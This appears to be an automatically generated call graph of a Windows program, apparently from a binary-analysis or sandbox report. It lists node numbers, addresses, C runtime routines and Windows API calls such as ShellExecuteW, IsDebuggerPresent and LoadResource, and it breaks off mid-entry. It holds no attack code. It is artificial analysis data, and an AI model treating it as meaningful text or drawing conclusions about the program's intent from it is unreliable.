92708->92780 92711 3a5ec8 92712 3a5ed3 92711->92712 92815 3a115b 47 API calls 3 library calls 92711->92815 92794 3a1195 92712->92794 92715 3a5edb 92716 3a5ee6 __wwincmdln 92715->92716 92816 3a115b 47 API calls 3 library calls 92715->92816 92798 383a0f 92716->92798 92719 3a5efa 92720 3a5f09 92719->92720 92817 3a13f1 47 API calls _doexit 92719->92817 92818 3a1186 47 API calls _doexit 92720->92818 92723 3a5f0e ___lock_fhandle 92725 3a7f01 92724->92725 92725->92690 92726->92692 92819 3a123a 30 API calls 2 library calls 92727->92819 92729 3a7b4c 92820 3a7e23 InitializeCriticalSectionAndSpinCount 92729->92820 92731 3a7b51 92732 3a7b55 92731->92732 92822 3a7e6d TlsAlloc 92731->92822 92821 3a7bbd 50 API calls 2 library calls 92732->92821 92735 3a7b5a 92735->92696 92736 3a7b67 92736->92732 92737 3a7b72 92736->92737 92823 3a6986 92737->92823 92740 3a7bb4 92831 3a7bbd 50 API calls 2 library calls 92740->92831 92743 3a7b93 92743->92740 92745 3a7b99 92743->92745 92744 3a7bb9 92744->92696 92830 3a7a94 47 API calls 4 library calls 92745->92830 92747 3a7ba1 GetCurrentThreadId 92747->92696 92749 3aacbf ___lock_fhandle 92748->92749 92840 3a7cf4 92749->92840 92751 3aacc6 92752 3a6986 __calloc_crt 47 API calls 92751->92752 92753 3aacd7 92752->92753 92754 3aace2 ___lock_fhandle @_EH4_CallFilterFunc@8 92753->92754 92755 3aad42 GetStartupInfoW 92753->92755 92754->92700 92762 3aae80 92755->92762 92764 3aad57 92755->92764 92756 3aaf44 92847 3aaf58 LeaveCriticalSection _doexit 92756->92847 92758 3aaec9 GetStdHandle 92758->92762 92759 3a6986 __calloc_crt 47 API calls 92759->92764 92760 3aaedb GetFileType 92760->92762 92761 3aada5 92761->92762 92765 3aadd7 GetFileType 92761->92765 92766 3aade5 InitializeCriticalSectionAndSpinCount 92761->92766 92762->92756 92762->92758 92762->92760 92763 3aaf08 InitializeCriticalSectionAndSpinCount 92762->92763 92763->92762 92764->92759 92764->92761 92764->92762 92765->92761 92765->92766 92766->92761 92768 3b2e8e 92767->92768 92769 3a5ead 92767->92769 92886 3a69d0 47 API calls __crtLCMapStringA_stat 92768->92886 92774 3b2a7b GetModuleFileNameW 92769->92774 92772 3b2eb4 _memcpy_s 92773 3b2eca FreeEnvironmentStringsW 92772->92773 92773->92769 92775 3b2aaf _wparse_cmdline 92774->92775 92776 3a5eb7 92775->92776 92777 3b2ae9 92775->92777 92776->92708 92814 3a115b 47 API calls 3 library calls 92776->92814 92887 3a69d0 47 API calls __crtLCMapStringA_stat 92777->92887 92779 3b2aef _wparse_cmdline 92779->92776 92781 3b2ccd __NMSG_WRITE 92780->92781 92785 3b2cc5 92780->92785 92782 3a6986 __calloc_crt 47 API calls 92781->92782 92790 3b2cf6 __NMSG_WRITE 92782->92790 92783 3b2d4d 92784 3a1c9d _free 47 API calls 92783->92784 92784->92785 92785->92711 92786 3a6986 __calloc_crt 47 API calls 92786->92790 92787 3b2d72 92789 3a1c9d _free 47 API calls 92787->92789 92789->92785 92790->92783 92790->92785 92790->92786 92790->92787 92791 3b2d89 92790->92791 92888 3b2567 47 API calls __wtof_l 92790->92888 92889 3a6e20 IsProcessorFeaturePresent 92791->92889 92793 3b2d95 92793->92711 92795 3a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92794->92795 92797 3a11e0 __IsNonwritableInCurrentImage 92795->92797 92912 3a0f0a 52 API calls __cinit 92795->92912 92797->92715 92799 3f1ebf 92798->92799 92800 383a29 92798->92800 92801 383a63 IsThemeActive 92800->92801 92913 3a1405 92801->92913 92805 383a8f 92925 383adb SystemParametersInfoW SystemParametersInfoW 92805->92925 92807 383a9b 92926 383d19 92807->92926 92809 383aa3 SystemParametersInfoW 92810 383ac8 92809->92810 92810->92719 92811->92693 92812->92697 92813->92704 92817->92720 92818->92723 92819->92729 92820->92731 92821->92735 92822->92736 92826 3a698d 92823->92826 92825 3a69ca 92825->92740 92829 3a7ec9 TlsSetValue 92825->92829 92826->92825 92827 3a69ab Sleep 92826->92827 92832 3b30aa 92826->92832 92828 3a69c2 92827->92828 92828->92825 92828->92826 92829->92743 92830->92747 92831->92744 92833 3b30d0 __calloc_impl 92832->92833 92834 3b30b5 92832->92834 92837 3b30e0 HeapAlloc 92833->92837 92838 3b30c6 92833->92838 92834->92833 92835 3b30c1 92834->92835 92839 3a7c0e 47 API calls __getptd_noexit 92835->92839 92837->92833 92837->92838 92838->92826 92839->92838 92841 3a7d18 EnterCriticalSection 92840->92841 92842 3a7d05 92840->92842 92841->92751 92848 3a7d7c 92842->92848 92844 3a7d0b 92844->92841 92872 3a115b 47 API calls 3 library calls 92844->92872 92847->92754 92849 3a7d88 ___lock_fhandle 92848->92849 92850 3a7da9 92849->92850 92851 3a7d91 92849->92851 92853 3a7da7 92850->92853 92861 3a7e11 ___lock_fhandle 92850->92861 92873 3a81c2 47 API calls __NMSG_WRITE 92851->92873 92853->92850 92876 3a69d0 47 API calls __crtLCMapStringA_stat 92853->92876 92854 3a7d96 92874 3a821f 47 API calls 5 library calls 92854->92874 92857 3a7dbd 92858 3a7dd3 92857->92858 92859 3a7dc4 92857->92859 92863 3a7cf4 __lock 46 API calls 92858->92863 92877 3a7c0e 47 API calls __getptd_noexit 92859->92877 92860 3a7d9d 92875 3a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92860->92875 92861->92844 92866 3a7dda 92863->92866 92865 3a7dc9 92865->92861 92867 3a7de9 InitializeCriticalSectionAndSpinCount 92866->92867 92868 3a7dfe 92866->92868 92870 3a7e04 92867->92870 92878 3a1c9d 92868->92878 92884 3a7e1a LeaveCriticalSection _doexit 92870->92884 92873->92854 92874->92860 92876->92857 92877->92865 92879 3a1ca6 RtlFreeHeap 92878->92879 92883 3a1ccf _free 92878->92883 92880 3a1cbb 92879->92880 92879->92883 92885 3a7c0e 47 API calls __getptd_noexit 92880->92885 92882 3a1cc1 GetLastError 92882->92883 92883->92870 92884->92861 92885->92882 92886->92772 92887->92779 92888->92790 92890 3a6e2b 92889->92890 92895 3a6cb5 92890->92895 92894 3a6e46 92894->92793 92896 3a6ccf _memset ___raise_securityfailure 92895->92896 92897 3a6cef IsDebuggerPresent 92896->92897 92903 3a81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92897->92903 92900 3a6db3 ___raise_securityfailure 92904 3aa70c 92900->92904 92901 3a6dd6 92902 3a8197 GetCurrentProcess TerminateProcess 92901->92902 92902->92894 92903->92900 92905 3aa716 IsProcessorFeaturePresent 92904->92905 92906 3aa714 92904->92906 92908 3b37b0 92905->92908 92906->92901 92911 3b375f 5 API calls ___raise_securityfailure 92908->92911 92910 3b3893 92910->92901 92911->92910 92912->92797 92914 3a7cf4 __lock 47 API calls 92913->92914 92915 3a1410 92914->92915 92978 3a7e58 LeaveCriticalSection 92915->92978 92917 383a88 92918 3a146d 92917->92918 92919 3a1491 92918->92919 92920 3a1477 92918->92920 92919->92805 92920->92919 92979 3a7c0e 47 API calls __getptd_noexit 92920->92979 92922 3a1481 92980 3a6e10 8 API calls __wtof_l 92922->92980 92924 3a148c 92924->92805 92925->92807 92927 383d26 __ftell_nolock 92926->92927 92928 38d7f7 48 API calls 92927->92928 92929 383d31 GetCurrentDirectoryW 92928->92929 92981 3861ca 92929->92981 92931 383d57 IsDebuggerPresent 92932 3f1cc1 MessageBoxA 92931->92932 92933 383d65 92931->92933 92935 3f1cd9 92932->92935 92933->92935 92936 383d82 92933->92936 92965 383e3a 92933->92965 92934 383e41 SetCurrentDirectoryW 92937 383e4e Mailbox 92934->92937 93167 39c682 48 API calls 92935->93167 93055 3840e5 92936->93055 92937->92809 92940 3f1ce9 92946 3f1cff SetCurrentDirectoryW 92940->92946 92942 383da0 GetFullPathNameW 92943 386a63 48 API calls 92942->92943 92944 383ddb 92943->92944 93071 386430 92944->93071 92946->92937 92948 383df6 92949 383e00 92948->92949 93168 3c71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92948->93168 93087 383e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92949->93087 92952 3f1d1c 92952->92949 92955 3f1d2d 92952->92955 92957 385374 50 API calls 92955->92957 92956 383e0a 92958 383e1f 92956->92958 93095 384ffc 92956->93095 92959 3f1d35 92957->92959 93105 38e8d0 92958->93105 92962 38ce19 48 API calls 92959->92962 92964 3f1d42 92962->92964 92966 3f1d6e 92964->92966 92967 3f1d49 92964->92967 92965->92934 92969 38518c 48 API calls 92966->92969 92970 38518c 48 API calls 92967->92970 92971 3f1d6a GetForegroundWindow ShellExecuteW 92969->92971 92972 3f1d54 92970->92972 92975 3f1d9e Mailbox 92971->92975 92974 38510d 48 API calls 92972->92974 92976 3f1d61 92974->92976 92975->92965 92977 38518c 48 API calls 92976->92977 92977->92971 92978->92917 92979->92922 92980->92924 93169 39e99b 92981->93169 92985 3861eb 92986 385374 50 API calls 92985->92986 92987 3861ff 92986->92987 92988 38ce19 48 API calls 92987->92988 92989 38620c 92988->92989 93186 3839db 92989->93186 92991 386216 Mailbox 92992 386eed 48 API calls 92991->92992 92993 38622b 92992->92993 93198 389048 92993->93198 92996 38ce19 48 API calls 92997 386244 92996->92997 93201 38d6e9 92997->93201 92999 386254 Mailbox 93000 38ce19 48 API calls 92999->93000 93001 38627c 93000->93001 93002 38d6e9 55 API calls 93001->93002 93003 38628f Mailbox 93002->93003 93004 38ce19 48 API calls 93003->93004 93005 3862a0 93004->93005 93205 38d645 93005->93205 93007 3862b2 Mailbox 93008 38d7f7 48 API calls 93007->93008 93009 3862c5 93008->93009 93215 3863fc 93009->93215 93013 3862df 93014 3862e9 93013->93014 93015 3f1c08 93013->93015 93017 3a0fa7 _W_store_winword 59 API calls 93014->93017 93016 3863fc 48 API calls 93015->93016 93019 3f1c1c 93016->93019 93018 3862f4 93017->93018 93018->93019 93020 3862fe 93018->93020 93022 3863fc 48 API calls 93019->93022 93021 3a0fa7 _W_store_winword 59 API calls 93020->93021 93023 386309 93021->93023 93024 3f1c38 93022->93024 93023->93024 93025 386313 93023->93025 93027 385374 50 API calls 93024->93027 93026 3a0fa7 _W_store_winword 59 API calls 93025->93026 93029 38631e 93026->93029 93028 3f1c5d 93027->93028 93030 3863fc 48 API calls 93028->93030 93031 38635f 93029->93031 93033 3f1c86 93029->93033 93036 3863fc 48 API calls 93029->93036 93032 3f1c69 93030->93032 93031->93033 93034 38636c 93031->93034 93035 386eed 48 API calls 93032->93035 93037 386eed 48 API calls 93033->93037 93231 39c050 93034->93231 93039 3f1c77 93035->93039 93040 386342 93036->93040 93041 3f1ca8 93037->93041 93043 3863fc 48 API calls 93039->93043 93044 386eed 48 API calls 93040->93044 93045 3863fc 48 API calls 93041->93045 93042 386384 93242 391b90 93042->93242 93043->93033 93047 386350 93044->93047 93048 3f1cb5 93045->93048 93049 3863fc 48 API calls 93047->93049 93048->93048 93049->93031 93050 391b90 48 API calls 93054 386394 93050->93054 93052 3863fc 48 API calls 93052->93054 93053 3863d6 Mailbox 93053->92931 93054->93050 93054->93052 93054->93053 93258 386b68 48 API calls 93054->93258 93056 3840f2 __ftell_nolock 93055->93056 93057 38410b 93056->93057 93059 3f370e _memset 93056->93059 93058 38660f 49 API calls 93057->93058 93060 384114 93058->93060 93061 3f372a GetOpenFileNameW 93059->93061 93786 3840a7 93060->93786 93063 3f3779 93061->93063 93064 386a63 48 API calls 93063->93064 93066 3f378e 93064->93066 93066->93066 93068 384129 93804 384139 93068->93804 93072 38643d __ftell_nolock 93071->93072 94004 384c75 93072->94004 93074 386442 93086 383dee 93074->93086 94015 385928 86 API calls 93074->94015 93076 38644f 93076->93086 94016 385798 88 API calls Mailbox 93076->94016 93078 386458 93079 38645c GetFullPathNameW 93078->93079 93078->93086 93080 386a63 48 API calls 93079->93080 93081 386488 93080->93081 93082 386a63 48 API calls 93081->93082 93083 386495 93082->93083 93084 386a63 48 API calls 93083->93084 93085 3f5dcf _wcscat 93083->93085 93084->93086 93086->92940 93086->92948 93088 383ed8 93087->93088 93089 3f1cba 93087->93089 94062 384024 93088->94062 93093 383e05 93094 3836b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93093->93094 93094->92956 93096 385027 _memset 93095->93096 94067 384c30 93096->94067 93099 3850ac 93101 3850ca Shell_NotifyIconW 93099->93101 93102 3f3d28 Shell_NotifyIconW 93099->93102 94071 3851af 93101->94071 93104 3850df 93104->92958 93106 38e8f6 93105->93106 93165 38e906 Mailbox 93105->93165 93108 38ed52 93106->93108 93106->93165 93107 3ccc5c 86 API calls 93107->93165 94264 39e3cd 335 API calls 93108->94264 93110 383e2a 93110->92965 93166 383847 Shell_NotifyIconW _memset 93110->93166 93112 38ed63 93112->93110 93114 38ed70 93112->93114 93113 38e94c PeekMessageW 93113->93165 94266 39e312 335 API calls Mailbox 93114->94266 93115 3f526e Sleep 93115->93165 93117 38ed77 LockWindowUpdate DestroyWindow GetMessageW 93117->93110 93121 38eda9 93117->93121 93120 38ebc7 93120->93110 94265 382ff6 16 API calls 93120->94265 93122 3f59ef TranslateMessage DispatchMessageW GetMessageW 93121->93122 93122->93122 93124 3f5a1f 93122->93124 93123 39f4ea 48 API calls 93123->93165 93124->93110 93125 38ed21 PeekMessageW 93125->93165 93126 38ebf7 timeGetTime 93126->93165 93128 386eed 48 API calls 93128->93165 93129 3f5557 WaitForSingleObject 93130 3f5574 GetExitCodeProcess CloseHandle 93129->93130 93129->93165 93130->93165 93131 3f588f Sleep 93161 3f5429 Mailbox 93131->93161 93132 38ed3a TranslateMessage DispatchMessageW 93132->93125 93133 38d7f7 48 API calls 93133->93161 93134 38edae timeGetTime 94267 381caa 49 API calls 93134->94267 93136 3f5733 Sleep 93136->93161 93139 3f5926 GetExitCodeProcess 93144 3f593c WaitForSingleObject 93139->93144 93145 3f5952 CloseHandle 93139->93145 93140 382aae 311 API calls 93140->93165 93142 39dc38 timeGetTime 93142->93161 93143 3f5445 Sleep 93143->93165 93144->93145 93144->93165 93145->93161 93146 3f5432 Sleep 93146->93143 93147 3e8c4b 108 API calls 93147->93161 93148 382c79 107 API calls 93148->93161 93150 3f59ae Sleep 93150->93165 93151 381caa 49 API calls 93151->93165 93154 38ce19 48 API calls 93154->93161 93157 38d6e9 55 API calls 93157->93161 93161->93133 93161->93139 93161->93142 93161->93143 93161->93146 93161->93147 93161->93148 93161->93150 93161->93154 93161->93157 93161->93165 94269 3c4cbe 49 API calls Mailbox 93161->94269 94270 381caa 49 API calls 93161->94270 94271 382aae 335 API calls 93161->94271 94301 3dccb2 50 API calls 93161->94301 94302 3c7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93161->94302 94303 3c6532 63 API calls 3 library calls 93161->94303 93163 38d6e9 55 API calls 93163->93165 93164 38ce19 48 API calls 93164->93165 93165->93107 93165->93113 93165->93115 93165->93120 93165->93123 93165->93125 93165->93126 93165->93128 93165->93129 93165->93131 93165->93132 93165->93134 93165->93136 93165->93140 93165->93143 93165->93151 93165->93161 93165->93163 93165->93164 94094 38ef00 93165->94094 94099 38f110 93165->94099 94164 3945e0 93165->94164 94181 39e244 93165->94181 94186 39dc5f 93165->94186 94191 38eed0 335 API calls Mailbox 93165->94191 94192 393200 93165->94192 94268 3e8d23 48 API calls 93165->94268 94272 38fe30 93165->94272 93166->92965 93167->92940 93168->92952 93170 38d7f7 48 API calls 93169->93170 93171 3861db 93170->93171 93172 386009 93171->93172 93173 386016 __ftell_nolock 93172->93173 93174 386a63 48 API calls 93173->93174 93179 38617c Mailbox 93173->93179 93176 386048 93174->93176 93184 38607e Mailbox 93176->93184 93259 3861a6 93176->93259 93177 3861a6 48 API calls 93177->93184 93178 38614f 93178->93179 93180 38ce19 48 API calls 93178->93180 93179->92985 93182 386170 93180->93182 93181 38ce19 48 API calls 93181->93184 93183 3864cf 48 API calls 93182->93183 93183->93179 93184->93177 93184->93178 93184->93179 93184->93181 93185 3864cf 48 API calls 93184->93185 93185->93184 93262 3841a9 93186->93262 93189 383a06 93189->92991 93192 3f2ff0 93194 3a1c9d _free 47 API calls 93192->93194 93195 3f2ffd 93194->93195 93196 384252 84 API calls 93195->93196 93197 3f3006 93196->93197 93197->93197 93199 39f4ea 48 API calls 93198->93199 93200 386237 93199->93200 93200->92996 93202 38d6f4 93201->93202 93204 38d71b 93202->93204 93775 38d764 55 API calls 93202->93775 93204->92999 93206 38d654 93205->93206 93213 38d67e 93205->93213 93207 38d65b 93206->93207 93210 38d6c2 93206->93210 93208 38d666 93207->93208 93214 38d6ab 93207->93214 93776 38d9a0 53 API calls __cinit 93208->93776 93210->93214 93778 39dce0 53 API calls 93210->93778 93213->93007 93214->93213 93777 39dce0 53 API calls 93214->93777 93216 38641f 93215->93216 93217 386406 93215->93217 93219 386a63 48 API calls 93216->93219 93218 386eed 48 API calls 93217->93218 93220 3862d1 93218->93220 93219->93220 93221 3a0fa7 93220->93221 93222 3a1028 93221->93222 93223 3a0fb3 93221->93223 93781 3a103a 59 API calls 3 library calls 93222->93781 93230 3a0fd8 93223->93230 93779 3a7c0e 47 API calls __getptd_noexit 93223->93779 93226 3a1035 93226->93013 93227 3a0fbf 93780 3a6e10 8 API calls __wtof_l 93227->93780 93229 3a0fca 93229->93013 93230->93013 93232 39c064 93231->93232 93234 39c069 Mailbox 93231->93234 93782 39c1af 48 API calls 93232->93782 93240 39c077 93234->93240 93783 39c15c 48 API calls 93234->93783 93236 39f4ea 48 API calls 93238 39c108 93236->93238 93237 39c152 93237->93042 93239 39f4ea 48 API calls 93238->93239 93241 39c113 93239->93241 93240->93236 93240->93237 93241->93042 93241->93241 93243 391cf6 93242->93243 93245 391ba2 93242->93245 93243->93054 93244 391bae 93253 391bb9 93244->93253 93785 39c15c 48 API calls 93244->93785 93245->93244 93247 39f4ea 48 API calls 93245->93247 93248 3f49c4 93247->93248 93249 39f4ea 48 API calls 93248->93249 93252 3f49cf 93249->93252 93250 391c5d 93250->93054 93251 39f4ea 48 API calls 93254 391c9f 93251->93254 93252->93244 93257 39f4ea 48 API calls 93252->93257 93253->93250 93253->93251 93255 391cb2 93254->93255 93784 382925 48 API calls 93254->93784 93255->93054 93257->93252 93258->93054 93260 38bdfa 48 API calls 93259->93260 93261 3861b1 93260->93261 93261->93176 93327 384214 93262->93327 93267 3f4f73 93269 384252 84 API calls 93267->93269 93268 3841d4 LoadLibraryExW 93337 384291 93268->93337 93271 3f4f7a 93269->93271 93273 384291 3 API calls 93271->93273 93275 3f4f82 93273->93275 93363 3844ed 93275->93363 93276 3841fb 93276->93275 93277 384207 93276->93277 93278 384252 84 API calls 93277->93278 93280 3839fe 93278->93280 93280->93189 93286 3cc396 93280->93286 93283 3f4fa9 93371 384950 93283->93371 93285 3f4fb6 93287 384517 83 API calls 93286->93287 93288 3cc405 93287->93288 93549 3cc56d 93288->93549 93291 3844ed 64 API calls 93292 3cc432 93291->93292 93293 3844ed 64 API calls 93292->93293 93294 3cc442 93293->93294 93295 3844ed 64 API calls 93294->93295 93296 3cc45d 93295->93296 93297 3844ed 64 API calls 93296->93297 93298 3cc478 93297->93298 93299 384517 83 API calls 93298->93299 93300 3cc48f 93299->93300 93301 3a395c __crtLCMapStringA_stat 47 API calls 93300->93301 93302 3cc496 93301->93302 93303 3a395c __crtLCMapStringA_stat 47 API calls 93302->93303 93304 3cc4a0 93303->93304 93305 3844ed 64 API calls 93304->93305 93306 3cc4b4 93305->93306 93307 3cbf5a GetSystemTimeAsFileTime 93306->93307 93308 3cc4c7 93307->93308 93309 3cc4dc 93308->93309 93310 3cc4f1 93308->93310 93311 3a1c9d _free 47 API calls 93309->93311 93312 3cc556 93310->93312 93313 3cc4f7 93310->93313 93314 3cc4e2 93311->93314 93316 3a1c9d _free 47 API calls 93312->93316 93555 3cb965 118 API calls __fcloseall 93313->93555 93317 3a1c9d _free 47 API calls 93314->93317 93319 3cc41b 93316->93319 93317->93319 93318 3cc54e 93320 3a1c9d _free 47 API calls 93318->93320 93319->93192 93321 384252 93319->93321 93320->93319 93322 38425c 93321->93322 93324 384263 93321->93324 93556 3a35e4 93322->93556 93325 384272 93324->93325 93326 384283 FreeLibrary 93324->93326 93325->93192 93326->93325 93376 384339 93327->93376 93330 38423c 93332 3841bb 93330->93332 93333 384244 FreeLibrary 93330->93333 93334 3a3499 93332->93334 93333->93332 93384 3a34ae 93334->93384 93336 3841c8 93336->93267 93336->93268 93463 3842e4 93337->93463 93340 3842b8 93342 3841ec 93340->93342 93343 3842c1 FreeLibrary 93340->93343 93344 384380 93342->93344 93343->93342 93345 39f4ea 48 API calls 93344->93345 93346 384395 93345->93346 93347 3847b7 48 API calls 93346->93347 93348 3843a1 _memcpy_s 93347->93348 93349 3843dc 93348->93349 93351 384499 93348->93351 93352 3844d1 93348->93352 93350 384950 57 API calls 93349->93350 93356 3843e5 93350->93356 93471 38406b CreateStreamOnHGlobal 93351->93471 93482 3cc750 93 API calls 93352->93482 93355 3844ed 64 API calls 93355->93356 93356->93355 93358 384479 93356->93358 93359 3f4ed7 93356->93359 93477 384517 93356->93477 93358->93276 93360 384517 83 API calls 93359->93360 93361 3f4eeb 93360->93361 93362 3844ed 64 API calls 93361->93362 93362->93358 93364 3844ff 93363->93364 93367 3f4fc0 93363->93367 93506 3a381e 93364->93506 93368 3cbf5a 93526 3cbdb4 93368->93526 93370 3cbf70 93370->93283 93372 38495f 93371->93372 93373 3f5002 93371->93373 93531 3a3e65 93372->93531 93375 384967 93375->93285 93380 38434b 93376->93380 93379 384321 LoadLibraryA GetProcAddress 93379->93330 93381 38422f 93380->93381 93382 384354 LoadLibraryA 93380->93382 93381->93330 93381->93379 93382->93381 93383 384365 GetProcAddress 93382->93383 93383->93381 93386 3a34ba ___lock_fhandle 93384->93386 93385 3a34cd 93432 3a7c0e 47 API calls __getptd_noexit 93385->93432 93386->93385 93388 3a34fe 93386->93388 93403 3ae4c8 93388->93403 93389 3a34d2 93433 3a6e10 8 API calls __wtof_l 93389->93433 93392 3a3503 93393 3a3519 93392->93393 93394 3a350c 93392->93394 93396 3a3543 93393->93396 93397 3a3523 93393->93397 93434 3a7c0e 47 API calls __getptd_noexit 93394->93434 93417 3ae5e0 93396->93417 93435 3a7c0e 47 API calls __getptd_noexit 93397->93435 93399 3a34dd ___lock_fhandle @_EH4_CallFilterFunc@8 93399->93336 93404 3ae4d4 ___lock_fhandle 93403->93404 93405 3a7cf4 __lock 47 API calls 93404->93405 93415 3ae4e2 93405->93415 93406 3ae559 93442 3a69d0 47 API calls __crtLCMapStringA_stat 93406->93442 93407 3ae552 93437 3ae5d7 93407->93437 93410 3ae560 93410->93407 93412 3ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93410->93412 93411 3ae5cc ___lock_fhandle 93411->93392 93412->93407 93413 3a7d7c __mtinitlocknum 47 API calls 93413->93415 93415->93406 93415->93407 93415->93413 93440 3a4e5b 48 API calls __lock 93415->93440 93441 3a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93415->93441 93419 3ae600 __wopenfile 93417->93419 93418 3ae61a 93447 3a7c0e 47 API calls __getptd_noexit 93418->93447 93419->93418 93431 3ae7d5 93419->93431 93449 3a185b 59 API calls 2 library calls 93419->93449 93421 3ae61f 93448 3a6e10 8 API calls __wtof_l 93421->93448 93423 3ae838 93444 3b63c9 93423->93444 93425 3a354e 93436 3a3570 LeaveCriticalSection LeaveCriticalSection _fseek 93425->93436 93427 3ae7ce 93427->93431 93450 3a185b 59 API calls 2 library calls 93427->93450 93429 3ae7ed 93429->93431 93451 3a185b 59 API calls 2 library calls 93429->93451 93431->93418 93431->93423 93432->93389 93433->93399 93434->93399 93435->93399 93436->93399 93443 3a7e58 LeaveCriticalSection 93437->93443 93439 3ae5de 93439->93411 93440->93415 93441->93415 93442->93410 93443->93439 93452 3b5bb1 93444->93452 93446 3b63e2 93446->93425 93447->93421 93448->93425 93449->93427 93450->93429 93451->93431 93453 3b5bbd ___lock_fhandle 93452->93453 93454 3b5bcf 93453->93454 93457 3b5c06 93453->93457 93455 3a7c0e __wtof_l 47 API calls 93454->93455 93456 3b5bd4 93455->93456 93458 3a6e10 __wtof_l 8 API calls 93456->93458 93459 3b5c78 __wsopen_helper 110 API calls 93457->93459 93460 3b5bde ___lock_fhandle 93458->93460 93461 3b5c23 93459->93461 93460->93446 93462 3b5c4c __wsopen_helper LeaveCriticalSection 93461->93462 93462->93460 93467 3842f6 93463->93467 93466 3842cc LoadLibraryA GetProcAddress 93466->93340 93468 3842aa 93467->93468 93469 3842ff LoadLibraryA 93467->93469 93468->93340 93468->93466 93469->93468 93470 384310 GetProcAddress 93469->93470 93470->93468 93472 384085 FindResourceExW 93471->93472 93474 3840a2 93471->93474 93473 3f4f16 LoadResource 93472->93473 93472->93474 93473->93474 93475 3f4f2b SizeofResource 93473->93475 93474->93349 93475->93474 93476 3f4f3f LockResource 93475->93476 93476->93474 93478 384526 93477->93478 93479 3f4fe0 93477->93479 93483 3a3a8d 93478->93483 93481 384534 93481->93356 93482->93349 93487 3a3a99 ___lock_fhandle 93483->93487 93484 3a3aa7 93496 3a7c0e 47 API calls __getptd_noexit 93484->93496 93486 3a3acd 93498 3a4e1c 93486->93498 93487->93484 93487->93486 93489 3a3aac 93497 3a6e10 8 API calls __wtof_l 93489->93497 93490 3a3ad3 93504 3a39fe 81 API calls 5 library calls 93490->93504 93493 3a3ae2 93505 3a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 93493->93505 93494 3a3ab7 ___lock_fhandle 93494->93481 93496->93489 93497->93494 93499 3a4e4e EnterCriticalSection 93498->93499 93500 3a4e2c 93498->93500 93502 3a4e44 93499->93502 93500->93499 93501 3a4e34 93500->93501 93503 3a7cf4 __lock 47 API calls 93501->93503 93502->93490 93503->93502 93504->93493 93505->93494 93509 3a3839 93506->93509 93508 384510 93508->93368 93510 3a3845 ___lock_fhandle 93509->93510 93511 3a3888 93510->93511 93512 3a3880 ___lock_fhandle 93510->93512 93515 3a385b _memset 93510->93515 93513 3a4e1c __lock_file 48 API calls 93511->93513 93512->93508 93514 3a388e 93513->93514 93524 3a365b 62 API calls 5 library calls 93514->93524 93522 3a7c0e 47 API calls __getptd_noexit 93515->93522 93518 3a3875 93523 3a6e10 8 API calls __wtof_l 93518->93523 93519 3a38a4 93525 3a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 93519->93525 93522->93518 93523->93512 93524->93519 93525->93512 93529 3a344a GetSystemTimeAsFileTime 93526->93529 93528 3cbdc3 93528->93370 93530 3a3478 __aulldiv 93529->93530 93530->93528 93532 3a3e71 ___lock_fhandle 93531->93532 93533 3a3e7f 93532->93533 93534 3a3e94 93532->93534 93545 3a7c0e 47 API calls __getptd_noexit 93533->93545 93536 3a4e1c __lock_file 48 API calls 93534->93536 93538 3a3e9a 93536->93538 93537 3a3e84 93546 3a6e10 8 API calls __wtof_l 93537->93546 93547 3a3b0c 55 API calls 5 library calls 93538->93547 93541 3a3ea5 93548 3a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93541->93548 93543 3a3eb7 93544 3a3e8f ___lock_fhandle 93543->93544 93544->93375 93545->93537 93546->93544 93547->93541 93548->93543 93554 3cc581 __tzset_nolock _wcscmp 93549->93554 93550 3cc417 93550->93291 93550->93319 93551 3844ed 64 API calls 93551->93554 93552 3cbf5a GetSystemTimeAsFileTime 93552->93554 93553 384517 83 API calls 93553->93554 93554->93550 93554->93551 93554->93552 93554->93553 93555->93318 93557 3a35f0 ___lock_fhandle 93556->93557 93558 3a361c 93557->93558 93559 3a3604 93557->93559 93562 3a4e1c __lock_file 48 API calls 93558->93562 93565 3a3614 ___lock_fhandle 93558->93565 93585 3a7c0e 47 API calls __getptd_noexit 93559->93585 93561 3a3609 93586 3a6e10 8 API calls __wtof_l 93561->93586 93564 3a362e 93562->93564 93569 3a3578 93564->93569 93565->93324 93570 3a359b 93569->93570 93571 3a3587 93569->93571 93577 3a3597 93570->93577 93588 3a2c84 93570->93588 93628 3a7c0e 47 API calls __getptd_noexit 93571->93628 93573 3a358c 93629 3a6e10 8 API calls __wtof_l 93573->93629 93587 3a3653 LeaveCriticalSection LeaveCriticalSection _fseek 93577->93587 93581 3a35b5 93605 3ae9d2 93581->93605 93583 3a35bb 93583->93577 93584 3a1c9d _free 47 API calls 93583->93584 93584->93577 93585->93561 93586->93565 93587->93565 93589 3a2c97 93588->93589 93593 3a2cbb 93588->93593 93590 3a2933 __fflush_nolock 47 API calls 93589->93590 93589->93593 93591 3a2cb4 93590->93591 93630 3aaf61 93591->93630 93594 3aeb36 93593->93594 93595 3a35af 93594->93595 93596 3aeb43 93594->93596 93598 3a2933 93595->93598 93596->93595 93597 3a1c9d _free 47 API calls 93596->93597 93597->93595 93599 3a293d 93598->93599 93600 3a2952 93598->93600 93736 3a7c0e 47 API calls __getptd_noexit 93599->93736 93600->93581 93602 3a2942 93737 3a6e10 8 API calls __wtof_l 93602->93737 93604 3a294d 93604->93581 93606 3ae9de ___lock_fhandle 93605->93606 93607 3ae9fe 93606->93607 93608 3ae9e6 93606->93608 93610 3aea7b 93607->93610 93615 3aea28 93607->93615 93753 3a7bda 47 API calls __getptd_noexit 93608->93753 93757 3a7bda 47 API calls __getptd_noexit 93610->93757 93611 3ae9eb 93754 3a7c0e 47 API calls __getptd_noexit 93611->93754 93614 3aea80 93758 3a7c0e 47 API calls __getptd_noexit 93614->93758 93617 3aa8ed ___lock_fhandle 49 API calls 93615->93617 93619 3aea2e 93617->93619 93618 3aea88 93759 3a6e10 8 API calls __wtof_l 93618->93759 93621 3aea4c 93619->93621 93622 